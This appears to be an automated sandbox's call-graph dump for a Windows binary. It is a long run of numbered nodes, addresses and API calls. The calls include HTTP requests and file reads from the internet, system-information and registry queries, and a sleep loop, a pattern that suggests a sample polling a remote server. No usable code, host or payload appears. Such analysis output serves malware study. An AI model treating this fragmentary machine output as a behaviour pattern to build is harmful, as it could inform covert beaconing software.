13899->13900 13901 5a29d2 13900->13901 13946 5a7dc0 13948 5a7dd6 13946->13948 13947 5a7deb 13948->13947 13949 5a8720 RtlAllocateHeap 13948->13949 13949->13947 13950 5a8bc0 13951 5a8c13 13950->13951 13952 5a8bd5 13950->13952 13953 5ac8f6 SleepConditionVariableCS 13952->13953 13954 5a8bdf 13953->13954 13954->13951 13955 5ace33 RtlAllocateHeap 13954->13955 13956 5a8c09 13955->13956 13957 5ac8ac RtlWakeAllConditionVariable 13956->13957 13957->13951 13473 59b230 13476 5a7cf0 13473->13476 13475 59b286 shared_ptr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 13477 5a7d3f 13476->13477 13479 5a7d4c 13476->13479 13480 5a94e0 13477->13480 13479->13475 13481 5a9611 13480->13481 13484 5a9505 13480->13484 13482 5a8a50 RtlAllocateHeap 13481->13482 13491 5a956b shared_ptr 13482->13491 13483 5a960c 13487 592380 RtlAllocateHeap 13483->13487 13484->13483 13485 5a955a 13484->13485 13486 5a9581 13484->13486 13485->13483 13488 5a9565 13485->13488 13490 5acbc7 RtlAllocateHeap 13486->13490 13486->13491 13487->13481 13489 5acbc7 RtlAllocateHeap 13488->13489 13489->13491 13490->13491 13491->13479 13958 5a63f0 13961 5a6420 13958->13961 13959 5a71e0 RtlAllocateHeap 13959->13961 13960 595d40 RtlAllocateHeap 13960->13961 13961->13959 13961->13960 13964 5a3f30 13961->13964 13963 5a646c Sleep 13963->13961 13965 5a3f6b 13964->13965 14079 5a45f0 shared_ptr 13964->14079 13967 5a71e0 RtlAllocateHeap 13965->13967 13965->14079 13966 5a46d9 shared_ptr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 13966->13963 13968 5a3f8c 13967->13968 13969 595d40 RtlAllocateHeap 13968->13969 13970 5a3f93 13969->13970 13972 5a71e0 RtlAllocateHeap 13970->13972 13974 5a3fa5 13972->13974 13973 5a4795 14302 5964d0 13973->14302 13976 5a71e0 RtlAllocateHeap 13974->13976 13977 5a3fb7 13976->13977 14227 59b670 13977->14227 13979 5a3fc3 13981 5a71e0 RtlAllocateHeap 13979->13981 13980 5a485e shared_ptr 14312 5978b0 13980->14312 13984 5a3fd8 13981->13984 13983 5a47a5 shared_ptr 13983->13980 14004 5a63c6 13983->14004 13986 5a71e0 RtlAllocateHeap 13984->13986 13985 5a486d 14385 5944b0 13985->14385 13988 5a3ff0 13986->13988 13991 595d40 RtlAllocateHeap 13988->13991 13989 5a487a 14389 597e50 13989->14389 13993 5a3ff7 13991->13993 13992 5a4886 13994 5944b0 RtlAllocateHeap 13992->13994 14251 598050 13993->14251 13996 5a4893 13994->13996 14001 5944b0 RtlAllocateHeap 13996->14001 13997 5a4003 13998 5a71e0 RtlAllocateHeap 13997->13998 14083 5a427d 13997->14083 14002 5a401f 13998->14002 13999 5a71e0 RtlAllocateHeap 14003 5a42af 13999->14003 14000 5a71e0 RtlAllocateHeap 14000->14004 14005 5a48b0 14001->14005 14006 5a71e0 RtlAllocateHeap 14002->14006 14007 5a71e0 RtlAllocateHeap 14003->14007 14004->14000 14008 595d40 RtlAllocateHeap 14004->14008 14017 5a3f30 16 API calls 14004->14017 14009 5a71e0 RtlAllocateHeap 14005->14009 14010 5a4037 14006->14010 14011 5a42c4 14007->14011 14008->14004 14013 5a48ce 14009->14013 14014 595d40 RtlAllocateHeap 14010->14014 14012 5a71e0 RtlAllocateHeap 14011->14012 14016 5a42d6 14012->14016 14018 595d40 RtlAllocateHeap 14013->14018 14015 5a403e 14014->14015 14019 598050 RtlAllocateHeap 14015->14019 14020 59b670 6 API calls 14016->14020 14021 5a646c Sleep 14017->14021 14022 5a48d5 14018->14022 14023 5a404a 14019->14023 14024 5a42e2 14020->14024 14021->14004 14025 5a71e0 RtlAllocateHeap 14022->14025 14028 5a71e0 RtlAllocateHeap 14023->14028 14023->14083 14026 5a71e0 RtlAllocateHeap 14024->14026 14027 5a48ea 14025->14027 14029 5a42f7 14026->14029 14030 595d40 RtlAllocateHeap 14027->14030 14031 5a4067 14028->14031 14032 5a71e0 RtlAllocateHeap 14029->14032 14033 5a48f1 14030->14033 14035 595d40 RtlAllocateHeap 14031->14035 14036 5a430f 14032->14036 14401 595e90 14033->14401 14040 5a406f 14035->14040 14037 595d40 RtlAllocateHeap 14036->14037 14038 5a4316 14037->14038 14039 598050 RtlAllocateHeap 14038->14039 14041 5a4322 14039->14041 14044 5a78a0 RtlAllocateHeap 14040->14044 14045 5a71e0 RtlAllocateHeap 14041->14045 14041->14079 14042 5a4903 14043 5a78a0 RtlAllocateHeap 14042->14043 14053 5a496c 14043->14053 14052 5a40d9 shared_ptr 14044->14052 14046 5a433e 14045->14046 14047 5a71e0 RtlAllocateHeap 14046->14047 14048 5a4356 14047->14048 14049 595d40 RtlAllocateHeap 14048->14049 14051 5a435d 14049->14051 14050 5a71e0 RtlAllocateHeap 14054 5a4166 14050->14054 14055 598050 RtlAllocateHeap 14051->14055 14052->14050 14409 5a75c0 14053->14409 14057 595d40 RtlAllocateHeap 14054->14057 14058 5a4369 14055->14058 14062 5a416e 14057->14062 14061 5a71e0 RtlAllocateHeap 14058->14061 14058->14079 14059 5a49d8 14060 5a6f40 RtlAllocateHeap 14059->14060 14066 5a4a37 14060->14066 14063 5a4386 14061->14063 14064 5a78a0 RtlAllocateHeap 14062->14064 14065 595d40 RtlAllocateHeap 14063->14065 14071 5a41c9 shared_ptr 14064->14071 14069 5a438e 14065->14069 14068 5a4ab5 shared_ptr 14066->14068 14422 5a8480 14066->14422 14076 5a78a0 RtlAllocateHeap 14068->14076 14072 5a43da 14069->14072 14073 5a4717 14069->14073 14071->14083 14257 5993c0 14071->14257 14075 5a78a0 RtlAllocateHeap 14072->14075 14074 5a79e0 RtlAllocateHeap 14073->14074 14077 5a471c 14074->14077 14084 5a43f8 shared_ptr 14075->14084 14089 5a4b7d shared_ptr 14076->14089 14078 5ab9b9 RtlAllocateHeap 14077->14078 14078->14079 14079->13966 14280 596160 14079->14280 14080 5a4255 __dosmaperr 14081 5c8229 5 API calls 14080->14081 14080->14083 14081->14083 14082 5a71e0 RtlAllocateHeap 14085 5a4485 14082->14085 14083->13999 14083->14077 14084->14079 14084->14082 14087 595d40 RtlAllocateHeap 14085->14087 14086 5944b0 RtlAllocateHeap 14088 5a4c1d 14086->14088 14093 5a448d 14087->14093 14090 5a71e0 RtlAllocateHeap 14088->14090 14089->14086 14091 5a4c37 14090->14091 14092 595d40 RtlAllocateHeap 14091->14092 14094 5a4c42 14092->14094 14095 5a78a0 RtlAllocateHeap 14093->14095 14096 5944b0 RtlAllocateHeap 14094->14096 14101 5a44e8 shared_ptr 14095->14101 14097 5a4c57 14096->14097 14098 5a71e0 RtlAllocateHeap 14097->14098 14100 5a4c6b 14098->14100 14099 5a71e0 RtlAllocateHeap 14102 5a4577 14099->14102 14103 595d40 RtlAllocateHeap 14100->14103 14101->14079 14101->14099 14104 5a71e0 RtlAllocateHeap 14102->14104 14105 5a4c76 14103->14105 14106 5a458c 14104->14106 14107 5a71e0 RtlAllocateHeap 14105->14107 14108 5a71e0 RtlAllocateHeap 14106->14108 14109 5a4c94 14107->14109 14110 5a45a7 14108->14110 14111 595d40 RtlAllocateHeap 14109->14111 14112 595d40 RtlAllocateHeap 14110->14112 14113 5a4c9f 14111->14113 14114 5a45ae 14112->14114 14115 5a71e0 RtlAllocateHeap 14113->14115 14119 5a78a0 RtlAllocateHeap 14114->14119 14116 5a4cbd 14115->14116 14117 595d40 RtlAllocateHeap 14116->14117 14118 5a4cc8 14117->14118 14120 5a71e0 RtlAllocateHeap 14118->14120 14121 5a45e7 14119->14121 14122 5a4ce6 14120->14122 14262 5a3b10 14121->14262 14124 595d40 RtlAllocateHeap 14122->14124 14125 5a4cf1 14124->14125 14126 5a71e0 RtlAllocateHeap 14125->14126 14127 5a4d0f 14126->14127 14128 595d40 RtlAllocateHeap 14127->14128 14129 5a4d1a 14128->14129 14130 5a71e0 RtlAllocateHeap 14129->14130 14131 5a4d38 14130->14131 14132 595d40 RtlAllocateHeap 14131->14132 14133 5a4d43 14132->14133 14134 5a71e0 RtlAllocateHeap 14133->14134 14135 5a4d61 14134->14135 14136 595d40 RtlAllocateHeap 14135->14136 14137 5a4d6c 14136->14137 14138 5a71e0 RtlAllocateHeap 14137->14138 14139 5a4d8a 14138->14139 14140 595d40 RtlAllocateHeap 14139->14140 14141 5a4d95 14140->14141 14142 5a71e0 RtlAllocateHeap 14141->14142 14143 5a4db1 14142->14143 14144 595d40 RtlAllocateHeap 14143->14144 14145 5a4dbc 14144->14145 14146 5a71e0 RtlAllocateHeap 14145->14146 14147 5a4dd3 14146->14147 14148 595d40 RtlAllocateHeap 14147->14148 14149 5a4dde 14148->14149 14150 5a71e0 RtlAllocateHeap 14149->14150 14151 5a4df5 14150->14151 14152 595d40 RtlAllocateHeap 14151->14152 14153 5a4e00 14152->14153 14154 5a71e0 RtlAllocateHeap 14153->14154 14155 5a4e1c 14154->14155 14156 595d40 RtlAllocateHeap 14155->14156 14157 5a4e27 14156->14157 14158 5a7b00 RtlAllocateHeap 14157->14158 14159 5a4e3b 14158->14159 14160 5a7a00 RtlAllocateHeap 14159->14160 14161 5a4e4f 14160->14161 14162 5a7a00 RtlAllocateHeap 14161->14162 14163 5a4e63 14162->14163 14164 5a7a00 RtlAllocateHeap 14163->14164 14165 5a4e77 14164->14165 14166 5a7b00 RtlAllocateHeap 14165->14166 14167 5a4e8b 14166->14167 14168 5a7a00 RtlAllocateHeap 14167->14168 14169 5a4e9f 14168->14169 14170 5a7b00 RtlAllocateHeap 14169->14170 14171 5a4eb3 14170->14171 14172 5a7a00 RtlAllocateHeap 14171->14172 14173 5a4ec7 14172->14173 14174 5a7b00 RtlAllocateHeap 14173->14174 14175 5a4edb 14174->14175 14176 5a7a00 RtlAllocateHeap 14175->14176 14177 5a4eef 14176->14177 14178 5a7b00 RtlAllocateHeap 14177->14178 14179 5a4f03 14178->14179 14180 5a7a00 RtlAllocateHeap 14179->14180 14181 5a4f17 14180->14181 14182 5a7b00 RtlAllocateHeap 14181->14182 14183 5a4f2b 14182->14183 14184 5a7a00 RtlAllocateHeap 14183->14184 14185 5a4f3f 14184->14185 14186 5a7b00 RtlAllocateHeap 14185->14186 14187 5a4f53 14186->14187 14188 5a7a00 RtlAllocateHeap 14187->14188 14189 5a4f67 14188->14189 14190 5a7b00 RtlAllocateHeap 14189->14190 14191 5a4f7b 14190->14191 14192 5a7a00 RtlAllocateHeap 14191->14192 14193 5a4f8f 14192->14193 14194 5a7b00 RtlAllocateHeap 14193->14194 14195 5a4fa3 14194->14195 14196 5a7a00 RtlAllocateHeap 14195->14196 14197 5a4fb7 14196->14197 14198 5a7a00 RtlAllocateHeap 14197->14198 14199 5a4fcb 14198->14199 14200 5a7a00 RtlAllocateHeap 14199->14200 14201 5a4fdf 14200->14201 14202 5a7b00 RtlAllocateHeap 14201->14202 14203 5a4ff3 shared_ptr 14202->14203 14204 5a5ddb 14203->14204 14205 5a5c87 14203->14205 14206 5a71e0 RtlAllocateHeap 14204->14206 14207 5a71e0 RtlAllocateHeap 14205->14207 14208 5a5df0 14206->14208 14209 5a5c9d 14207->14209 14210 5a71e0 RtlAllocateHeap 14208->14210 14211 595d40 RtlAllocateHeap 14209->14211 14212 5a5e05 14210->14212 14213 5a5ca8 14211->14213 14434 594940 14212->14434 14214 5a7b00 RtlAllocateHeap 14213->14214 14219 5a5cbc shared_ptr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 14214->14219 14216 5a5e14 14217 5a6f40 RtlAllocateHeap 14216->14217 14218 5a5e5b 14217->14218 14220 5a5f56 14218->14220 14225 5a8480 RtlAllocateHeap 14218->14225 14219->13963 14221 5a71e0 RtlAllocateHeap 14220->14221 14222 5a5f6c 14221->14222 14223 595d40 RtlAllocateHeap 14222->14223 14224 5a5f77 14223->14224 14226 5a7a00 RtlAllocateHeap 14224->14226 14225->14218 14226->14219 14228 59bab1 14227->14228 14229 59b6c2 14227->14229 14230 5a78a0 RtlAllocateHeap 14228->14230 14229->14228 14231 59b6d6 InternetOpenW InternetConnectA 14229->14231 14236 59ba5e shared_ptr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 14230->14236 14232 5a71e0 RtlAllocateHeap 14231->14232 14233 59b74d 14232->14233 14234 595d40 RtlAllocateHeap 14233->14234 14235 59b758 HttpOpenRequestA 14234->14235 14240 59b781 shared_ptr 14235->14240 14236->13979 14238 5a71e0 RtlAllocateHeap 14239 59b7e9 14238->14239 14241 595d40 RtlAllocateHeap 14239->14241 14240->14238 14242 59b7f4 14241->14242 14243 5a71e0 RtlAllocateHeap 14242->14243 14244 59b80d 14243->14244 14245 595d40 RtlAllocateHeap 14244->14245 14246 59b818 HttpSendRequestA 14245->14246 14249 59b83b shared_ptr 14246->14249 14248 59b8c3 InternetReadFile 14250 59b8ea 14248->14250 14249->14248 14255 598170 shared_ptr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 14251->14255 14256 5980a5 shared_ptr 14251->14256 14252 598237 14254 5a79e0 RtlAllocateHeap 14252->14254 14253 5a78a0 RtlAllocateHeap 14253->14256 14254->14255 14255->13997 14256->14252 14256->14253 14256->14255 14258 5a71e0 RtlAllocateHeap 14257->14258 14259 5993ee 14258->14259 14260 595d40 RtlAllocateHeap 14259->14260 14261 5993f7 shared_ptr __cftof __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 14260->14261 14261->14080 14263 5a71e0 RtlAllocateHeap 14262->14263 14264 5a3b52 14263->14264 14265 5a71e0 RtlAllocateHeap 14264->14265 14266 5a3b64 14265->14266 14267 598050 RtlAllocateHeap 14266->14267 14268 5a3b6d 14267->14268 14269 5a3dc6 14268->14269 14277 5a3b78 shared_ptr 14268->14277 14270 5a71e0 RtlAllocateHeap 14269->14270 14271 5a3dd7 14270->14271 14272 5a71e0 RtlAllocateHeap 14271->14272 14273 5a3dec 14272->14273 14274 5a71e0 RtlAllocateHeap 14273->14274 14276 5a3d90 shared_ptr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 14274->14276 14275 5a8a60 RtlAllocateHeap 14275->14277 14276->14079 14277->14275 14277->14276 14278 5a71e0 RtlAllocateHeap 14277->14278 14279 5a78a0 RtlAllocateHeap 14277->14279 14278->14277 14279->14277 14281 5961bf 14280->14281 14282 5a71e0 RtlAllocateHeap 14281->14282 14283 596226 14282->14283 14284 595d40 RtlAllocateHeap 14283->14284 14285 596231 14284->14285 14441 5921c0 14285->14441 14287 596249 shared_ptr 14288 5a71e0 RtlAllocateHeap 14287->14288 14300 596463 shared_ptr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 14287->14300 14289 5962b2 14288->14289 14290 595d40 RtlAllocateHeap 14289->14290 14291 5962bd 14290->14291 14292 5921c0 5 API calls 14291->14292 14301 5962d7 shared_ptr 14292->14301 14293 5963d2 14294 5a78a0 RtlAllocateHeap 14293->14294 14296 59641c 14294->14296 14295 5a71e0 RtlAllocateHeap 14295->14301 14297 5a78a0 RtlAllocateHeap 14296->14297 14297->14300 14298 595d40 RtlAllocateHeap 14298->14301 14299 5921c0 5 API calls 14299->14301 14300->13973 14301->14293 14301->14295 14301->14298 14301->14299 14301->14300 14303 596821 14302->14303 14311 596548 shared_ptr 14302->14311 14304 5968e3 14303->14304 14305 596844 14303->14305 14307 5a79e0 RtlAllocateHeap 14304->14307 14306 5a78a0 RtlAllocateHeap 14305->14306 14308 596863 shared_ptr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 14306->14308 14307->14308 14308->13983 14309 5a78a0 RtlAllocateHeap 14309->14311 14310 5a8a60 RtlAllocateHeap 14310->14311 14311->14303 14311->14304 14311->14308 14311->14309 14311->14310 14313 597916 __cftof 14312->14313 14314 5a71e0 RtlAllocateHeap 14313->14314 14353 597a68 shared_ptr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 14313->14353 14315 597947 14314->14315 14316 595d40 RtlAllocateHeap 14315->14316 14317 597952 14316->14317 14318 5a71e0 RtlAllocateHeap 14317->14318 14319 597974 14318->14319 14320 595d40 RtlAllocateHeap 14319->14320 14322 59797f shared_ptr 14320->14322 14321 597a53 GetNativeSystemInfo 14323 597a57 14321->14323 14322->14321 14322->14323 14322->14353 14324 597abf 14323->14324 14325 597b94 14323->14325 14323->14353 14327 5a71e0 RtlAllocateHeap 14324->14327 14326 5a71e0 RtlAllocateHeap 14325->14326 14328 597bc0 14326->14328 14329 597ae0 14327->14329 14330 595d40 RtlAllocateHeap 14328->14330 14331 595d40 RtlAllocateHeap 14329->14331 14332 597bc7 14330->14332 14333 597ae7 14331->14333 14334 5a71e0 RtlAllocateHeap 14332->14334 14335 5a71e0 RtlAllocateHeap 14333->14335 14337 597bdf 14334->14337 14336 597aff 14335->14336 14338 595d40 RtlAllocateHeap 14336->14338 14339 595d40 RtlAllocateHeap 14337->14339 14340 597b06 14338->14340 14341 597be6 14339->14341 14342 595e90 4 API calls 14340->14342 14343 595e90 4 API calls 14341->14343 14344 597b1b 14342->14344 14345 597bf7 14343->14345 14563 5c8331 14344->14563 14346 5a71e0 RtlAllocateHeap 14345->14346 14348 597c12 14346->14348 14349 595d40 RtlAllocateHeap 14348->14349 14350 597c19 14349->14350 14351 595860 RtlAllocateHeap 14350->14351 14352 597c28 14351->14352 14354 5a71e0 RtlAllocateHeap 14352->14354 14353->13985 14355 597c63 14354->14355 14356 595d40 RtlAllocateHeap 14355->14356 14357 597c6a 14356->14357 14358 5a71e0 RtlAllocateHeap 14357->14358 14359 597c82 14358->14359 14360 595d40 RtlAllocateHeap 14359->14360 14361 597c89 14360->14361 14362 595e90 4 API calls 14361->14362 14363 597c9a 14362->14363 14364 5a71e0 RtlAllocateHeap 14363->14364 14365 597cb5 14364->14365 14366 595d40 RtlAllocateHeap 14365->14366 14367 597cbc 14366->14367 14368 595860 RtlAllocateHeap 14367->14368 14369 597ccb 14368->14369 14370 5a71e0 RtlAllocateHeap 14369->14370 14371 597d06 14370->14371 14372 595d40 RtlAllocateHeap 14371->14372 14373 597d0d 14372->14373 14374 5a71e0 RtlAllocateHeap 14373->14374 14375 597d25 14374->14375 14376 595d40 RtlAllocateHeap 14375->14376 14377 597d2c 14376->14377 14378 595e90 4 API calls 14377->14378 14379 597d3d 14378->14379 14380 5a71e0 RtlAllocateHeap 14379->14380 14381 597d58 14380->14381 14382 595d40 RtlAllocateHeap 14381->14382 14383 597d5f 14382->14383 14384 595860 RtlAllocateHeap 14383->14384 14384->14353 14386 5944d4 14385->14386 14386->14386 14387 5a78a0 RtlAllocateHeap 14386->14387 14388 594547 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 14386->14388 14387->14388 14388->13989 14390 597eb5 __cftof 14389->14390 14391 5a71e0 RtlAllocateHeap 14390->14391 14399 597ed3 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 14390->14399 14392 597eec 14391->14392 14393 595d40 RtlAllocateHeap 14392->14393 14394 597ef7 14393->14394 14395 5a71e0 RtlAllocateHeap 14394->14395 14396 597f19 14395->14396 14397 595d40 RtlAllocateHeap 14396->14397 14400 597f24 shared_ptr 14397->14400 14398 597ff4 GetNativeSystemInfo 14398->14399 14399->13992 14400->14398 14400->14399 14566 5c38d0 14401->14566 14404 595f41 RegCloseKey 14406 595f67 14404->14406 14405 595f17 RegQueryValueExA 14405->14404 14406->14406 14407 5a78a0 RtlAllocateHeap 14406->14407 14408 595f7f shared_ptr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 14407->14408 14408->14042 14412 5a75e1 14409->14412 14413 5a760c 14409->14413 14410 5a7700 14411 5a8a50 RtlAllocateHeap 14410->14411 14416 5a7671 shared_ptr 14411->14416 14412->14059 14413->14410 14414 5a76fb 14413->14414 14417 5a7660 14413->14417 14418 5a7687 14413->14418 14415 592380 RtlAllocateHeap 14414->14415 14415->14410 14416->14059 14417->14414 14419 5a766b 14417->14419 14418->14416 14420 5acbc7 RtlAllocateHeap 14418->14420 14421 5acbc7 RtlAllocateHeap 14419->14421 14420->14416 14421->14416 14423 5a85a9 14422->14423 14424 5a84a3 14422->14424 14425 5a8a50 RtlAllocateHeap 14423->14425 14427 5a850f 14424->14427 14428 5a84e5 14424->14428 14426 5a85ae 14425->14426 14429 592380 RtlAllocateHeap 14426->14429 14431 5a84f6 shared_ptr 14427->14431 14433 5acbc7 RtlAllocateHeap 14427->14433 14428->14426 14430 5a84f0 14428->14430 14429->14431 14432 5acbc7 RtlAllocateHeap 14430->14432 14431->14066 14432->14431 14433->14431 14435 5a78a0 RtlAllocateHeap 14434->14435 14436 594993 14435->14436 14437 5a78a0 RtlAllocateHeap 14436->14437 14438 5949ac 14437->14438 14568 594590 14438->14568 14440 594a39 shared_ptr 14440->14216 14444 592180 14441->14444 14445 592196 14444->14445 14448 5c7f17 14445->14448 14451 5c6d06 14448->14451 14450 5921a4 14450->14287 14452 5c6d46 14451->14452 14456 5c6d2e __dosmaperr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ ___std_exception_copy 14451->14456 14453 5c60ea __cftof 5 API calls 14452->14453 14452->14456 14454 5c6d5e 14453->14454 14457 5c72c1 14454->14457 14456->14450 14459 5c72d2 14457->14459 14458 5c72e1 __dosmaperr ___std_exception_copy 14458->14456 14459->14458 14464 5c7865 14459->14464 14469 5c74bf 14459->14469 14474 5c74e5 14459->14474 14495 5c7633 14459->14495 14465 5c786e 14464->14465 14466 5c7875 14464->14466 14514 5c724d 14465->14514 14466->14459 14468 5c7874 14468->14459 14470 5c74cf 14469->14470 14471 5c74c8 14469->14471 14470->14459 14472 5c724d 5 API calls 14471->14472 14473 5c74ce 14472->14473 14473->14459 14475 5c74ec 14474->14475 14489 5c7506 __dosmaperr ___std_exception_copy 14474->14489 14476 5c764c 14475->14476 14477 5c76b8 14475->14477 14475->14489 14480 5c768f 14476->14480 14484 5c7658 14476->14484 14478 5c76fe 14477->14478 14479 5c76bf 14477->14479 14477->14480 14536 5c7d01 14478->14536 14482 5c76c4 14479->14482 14483 5c7666 14479->14483 14492 5c7674 14480->14492 14494 5c7688 14480->14494 14526 5c7b1d 14480->14526 14482->14480 14488 5c76c9 14482->14488 14483->14492 14483->14494 14530 5c793e 14483->14530 14484->14483 14487 5c769f 14484->14487 14484->14492 14487->14494 14518 5c7a8d 14487->14518 14488->14492 14488->14494 14522 5c7ce2 14488->14522 14489->14459 14492->14494 14539 5c7de7 14492->14539 14494->14459 14496 5c764c 14495->14496 14497 5c76b8 14495->14497 14498 5c768f 14496->14498 14499 5c7658 14496->14499 14497->14498 14500 5c76fe 14497->14500 14501 5c76bf 14497->14501 14506 5c7b1d RtlAllocateHeap 14498->14506 14511 5c7674 14498->14511 14513 5c7688 14498->14513 14503 5c7666 14499->14503 14505 5c769f 14499->14505 14499->14511 14504 5c7d01 RtlAllocateHeap 14500->14504 14502 5c76c4 14501->14502 14501->14503 14502->14498 14508 5c76c9 14502->14508 14507 5c793e 5 API calls 14503->14507 14503->14511 14503->14513 14504->14511 14509 5c7a8d 5 API calls 14505->14509 14505->14513 14506->14511 14507->14511 14510 5c7ce2 RtlAllocateHeap 14508->14510 14508->14511 14508->14513 14509->14511 14510->14511 14512 5c7de7 5 API calls 14511->14512 14511->14513 14512->14513 14513->14459 14515 5c725f __dosmaperr 14514->14515 14516 5c8229 5 API calls 14515->14516 14517 5c7282 __dosmaperr 14516->14517 14517->14468 14520 5c7aa8 14518->14520 14519 5c7ada 14519->14492 14520->14519 14543 5cbf0f 14520->14543 14523 5c7cee 14522->14523 14524 5c7b1d RtlAllocateHeap 14523->14524 14525 5c7d00 14524->14525 14525->14492 14528 5c7b30 14526->14528 14527 5c7b4b __dosmaperr ___std_exception_copy 14527->14492 14528->14527 14546 5c6e9c 14528->14546 14531 5c7957 14530->14531 14532 5c6e9c RtlAllocateHeap 14531->14532 14533 5c7994 14532->14533 14550 5cca49 14533->14550 14535 5c7a0a 14535->14492 14535->14535 14537 5c7b1d RtlAllocateHeap 14536->14537 14538 5c7d18 14537->14538 14538->14492 14540 5c7e04 14539->14540 14541 5c7e5a __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 14539->14541 14540->14541 14542 5cbf0f __cftof 5 API calls 14540->14542 14541->14494 14542->14540 14544 5cbdb4 __cftof 5 API calls 14543->14544 14545 5cbf27 14544->14545 14545->14519 14547 5c6ec0 14546->14547 14548 5c6eb1 __dosmaperr ___free_lconv_mon 14546->14548 14547->14548 14549 5ca7bb __cftof RtlAllocateHeap 14547->14549 14548->14527 14549->14548 14552 5cca59 __dosmaperr ___std_exception_copy 14550->14552 14554 5cca6f 14550->14554 14551 5ccb06 14556 5ccb2f 14551->14556 14557 5ccb65 14551->14557 14552->14535 14553 5ccb0b 14555 5cc260 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 14553->14555 14554->14551 14554->14552 14554->14553 14555->14552 14559 5ccb4d 14556->14559 14560 5ccb34 14556->14560 14558 5cc579 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 14557->14558 14558->14552 14562 5cc763 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 14559->14562 14561 5cc8bf GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 14560->14561 14561->14552 14562->14552 14564 5c7f87 5 API calls 14563->14564 14565 5c834f 14564->14565 14565->14353 14567 595ee4 RegOpenKeyExA 14566->14567 14567->14404 14567->14405 14569 5a78a0 RtlAllocateHeap 14568->14569 14576 594622 shared_ptr 14569->14576 14570 594788 shared_ptr 14571 594918 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 14570->14571 14572 5a78a0 RtlAllocateHeap 14570->14572 14574 5a8a60 RtlAllocateHeap 14570->14574 14577 594938 14570->14577 14571->14440 14572->14570 14573 5a78a0 RtlAllocateHeap 14573->14576 14574->14570 14575 5a8a60 RtlAllocateHeap 14575->14576 14576->14570 14576->14573 14576->14575 14576->14577 14578 5a78a0 RtlAllocateHeap 14577->14578 14579 594993 14578->14579 14580 5a78a0 RtlAllocateHeap 14579->14580 14581 5949ac 14580->14581 14582 594590 RtlAllocateHeap 14581->14582 14583 594a39 shared_ptr 14582->14583 14583->14440 14600 5a7fb0 14601 5acbc7 RtlAllocateHeap 14600->14601 14602 5a800a __cftof 14601->14602 14610 5a9390 14602->14610 14608 5a804c __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 14609 5a80bf 14611 5a93c5 14610->14611 14625 592be0 14611->14625 14613 5a93f6 14634 5a9750 14613->14634 14615 5a8034 14615->14608 14616 5942f0 14615->14616 14617 5ab6bf InitOnceExecuteOnce 14616->14617 14618 59430a 14617->14618 14619 594311 14618->14619 14620 5c649b 12 API calls 14618->14620 14622 5ab630 14619->14622 14621 594324 14620->14621 14821 5ab56b 14622->14821 14624 5ab646 std::_Throw_future_error 14624->14609 14626 592c1d 14625->14626 14627 5ab6bf InitOnceExecuteOnce 14626->14627 14629 592c46 14627->14629 14628 592c51 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 14628->14613 14629->14628 14631 592c88 14629->14631 14648 5ab6d7 14629->14648 14657 592340 14631->14657 14693 593740 14634->14693 14636 5a97cf 14637 5a97fc shared_ptr 14636->14637 14640 5a9838 14636->14640 14701 5a99f0 14637->14701 14639 5a981b 14639->14615 14641 5a9991 14640->14641 14643 5a998c 14640->14643 14645 5a98be 14640->14645 14642 5a8a50 RtlAllocateHeap 14641->14642 14647 5a98c4 shared_ptr 14642->14647 14644 592380 RtlAllocateHeap 